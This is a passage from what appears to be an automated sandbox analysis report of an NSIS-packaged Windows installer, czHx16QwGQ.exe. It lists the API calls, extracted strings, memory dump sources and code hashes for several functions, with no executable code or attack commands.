                                                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00402F27
                                                                                                                  • Part of subcall function 00402E72: MulDiv.KERNEL32(00016309,?,00019562), ref: 00402E87
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                • String ID: ... %d%%
                                                                                                                • API String ID: 722711167-2449383134
                                                                                                                • Opcode ID: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                                • Instruction ID: c65c9f61eb329069142d3a49436c3393aeffd9891ae55f37d91fa0e4ac25720a
                                                                                                                • Opcode Fuzzy Hash: c40ddff33436de44b244b2b19f9e8da7546f4e0328de08243a0837e5050f2c6b
                                                                                                                • Instruction Fuzzy Hash: 1A016170941614EBC7226B60EE4DA9B7B68BB01745B50413FF841F12E0CAB84459DBEE
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404D35
                                                                                                                • GetMessagePos.USER32 ref: 00404D3D
                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404D57
                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404D69
                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404D8F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                • String ID: f
                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                                • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                                APIs
                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                • wsprintfW.USER32 ref: 00402E45
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                • API String ID: 1451636040-1158693248
                                                                                                                • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                                • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                                • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                                • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                                APIs
                                                                                                                  • Part of subcall function 7396121B: GlobalAlloc.KERNELBASE(?,?,7396123B,?,739612DF,00000019,739611BE,-000000A0), ref: 73961225
                                                                                                                • GlobalFree.KERNEL32(?), ref: 73962657
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 7396268C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2221579317.0000000073961000.00000020.00000001.01000000.00000004.sdmp, Offset: 73960000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2220811519.0000000073960000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2221828367.0000000073964000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2222689147.0000000073966000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73960000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Free$Alloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1780285237-0
                                                                                                                • Opcode ID: b2e17fb98df548167ae9262147f30d6befabe8d3f5474c129cc95af9751ea2bc
                                                                                                                • Instruction ID: eb8bbe19825abbdaab35f39707d6c03bb38f9f15acd61c500de86bae742503bd
                                                                                                                • Opcode Fuzzy Hash: b2e17fb98df548167ae9262147f30d6befabe8d3f5474c129cc95af9751ea2bc
                                                                                                                • Instruction Fuzzy Hash: 7D31037210B519EFDB16AF91C894FAA77BAFB85344324453EF5868F260C7309815CB63
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405EDE: GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\czHx16QwGQ.exe,80000000,00000003), ref: 00405EE2
                                                                                                                  • Part of subcall function 00405EDE: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                • GlobalAlloc.KERNEL32(?,?), ref: 00402901
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00402981
                                                                                                                  • Part of subcall function 0040345D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 0040291D
                                                                                                                • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                  • Part of subcall function 004031D6: SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403182,000000FF,00000000,00000000,0040A230,?), ref: 004031FB
                                                                                                                • DeleteFileW.KERNEL32(?), ref: 00402995
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$Global$AllocFreePointer$AttributesCloseCreateDeleteHandle
                                                                                                                • String ID:
                                                                                                                • API String ID: 488507980-0
                                                                                                                • Opcode ID: 8381b4231eabbf673b08069758c6843b617af172fec4b02a039423957ade8c5d
                                                                                                                • Instruction ID: a72baa4c232b972dd9d74bdb0255e4e47dd94c062f2630ea412bfe515796ae85
                                                                                                                • Opcode Fuzzy Hash: 8381b4231eabbf673b08069758c6843b617af172fec4b02a039423957ade8c5d
                                                                                                                • Instruction Fuzzy Hash: 7A216DB1D00118BBCF116FA5DE48CAE7E79EF09364F10013AF5947A2E0CB794D419B98
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                • wsprintfW.USER32 ref: 00404CB6
                                                                                                                • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                • String ID: %u.%u%s%s$(7B
                                                                                                                • API String ID: 3540041739-1320723960
                                                                                                                • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                                • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                                • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                                • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                                APIs
                                                                                                                • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp\System.dll,?,?,?,00000021), ref: 004025E8
                                                                                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp\System.dll,?,?,?,00000021), ref: 004025F3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWidelstrlen
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp$C:\Users\user\AppData\Local\Temp\nsqC9EA.tmp\System.dll
                                                                                                                • API String ID: 3109718747-265733643
                                                                                                                • Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                                • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                                                                                • Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                                • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2221579317.0000000073961000.00000020.00000001.01000000.00000004.sdmp, Offset: 73960000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2220811519.0000000073960000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2221828367.0000000073964000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2222689147.0000000073966000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73960000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeGlobal
                                                                                                                • String ID:
                                                                                                                • API String ID: 2979337801-0
                                                                                                                • Opcode ID: ea1ce5d861fe7f685d438c1612a6964d21fa6170e430e2eb62bc9564fc105b85
                                                                                                                • Instruction ID: d0024a9871b06b06f4edce5b9e104dfbc4111e0dec7516adcb5b7b489bc0517d
                                                                                                                • Opcode Fuzzy Hash: ea1ce5d861fe7f685d438c1612a6964d21fa6170e430e2eb62bc9564fc105b85
                                                                                                                • Instruction Fuzzy Hash: B051C532D03159EBEB02DFA4CD407ADBBBEEB44394F18426AD407A3294D6719EC18793
                                                                                                                APIs
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 739624D6
                                                                                                                  • Part of subcall function 7396122C: lstrcpynW.KERNEL32(00000000,?,739612DF,00000019,739611BE,-000000A0), ref: 7396123C
                                                                                                                • GlobalAlloc.KERNEL32(?), ref: 7396245C
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 73962477
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2221579317.0000000073961000.00000020.00000001.01000000.00000004.sdmp, Offset: 73960000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2220811519.0000000073960000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2221828367.0000000073964000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2222689147.0000000073966000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73960000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                • String ID:
                                                                                                                • API String ID: 4216380887-0
                                                                                                                • Opcode ID: ed48bd0e5735da848dc042d74cba18bfc8092a1c469b6310bf72eefefcfbcaed
                                                                                                                • Instruction ID: 09524f4e4f5fe15fdeba7793416226dbbffaaea991c96a5959f5d1ead4384bd5
                                                                                                                • Opcode Fuzzy Hash: ed48bd0e5735da848dc042d74cba18bfc8092a1c469b6310bf72eefefcfbcaed
                                                                                                                • Instruction Fuzzy Hash: 1D419DB100A709EFD315EF61D844FA677B8FB88754F10492EE58B8B585EB70A484CB63
                                                                                                                APIs
                                                                                                                • GetDC.USER32(?), ref: 00401DBC
                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 3808545654-0
                                                                                                                • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                                • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                                • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                                • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                                APIs
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,739621EC,?,00000808), ref: 73961635
                                                                                                                • GlobalAlloc.KERNEL32(?,00000000,?,00000000,739621EC,?,00000808), ref: 7396163C
                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,739621EC,?,00000808), ref: 73961650
                                                                                                                • GetProcAddress.KERNEL32(739621EC,00000000), ref: 73961657
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 73961660
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2221579317.0000000073961000.00000020.00000001.01000000.00000004.sdmp, Offset: 73960000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2220811519.0000000073960000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2221828367.0000000073964000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2222689147.0000000073966000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73960000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1148316912-0
                                                                                                                • Opcode ID: 65f5c366cf1ec65614f6f895060ed0b150562d836593c0a311b3a1fde8c7361a
                                                                                                                • Instruction ID: 8f227666eb1ac5742b9279a2633dae44e20bee4833a1f3268f18baca3afcc4a6
                                                                                                                • Opcode Fuzzy Hash: 65f5c366cf1ec65614f6f895060ed0b150562d836593c0a311b3a1fde8c7361a
                                                                                                                • Instruction Fuzzy Hash: D1F0AC7320B538BBD62126E78C4CD9BBE9CDF8B6F5B210225F62C96190C6619D01D7F1
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1849352358-0
                                                                                                                • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                                • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                                • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                                • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                                APIs
                                                                                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                • String ID: !
                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                                • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                                • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                                • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,?,0000000A), ref: 00405CC3
                                                                                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,?,0000000A), ref: 00405CCD
                                                                                                                • lstrcatW.KERNEL32(?,0040A014,?,00000006,?,0000000A), ref: 00405CDF
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                • API String ID: 2659869361-4083868402
                                                                                                                • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                                                                                • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,?,00403576,00429240,NSIS Error,?,00000006,?,0000000A), ref: 004063F5
                                                                                                                  • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,75572EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,75572EE0,00000000), ref: 00405D76
                                                                                                                  • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
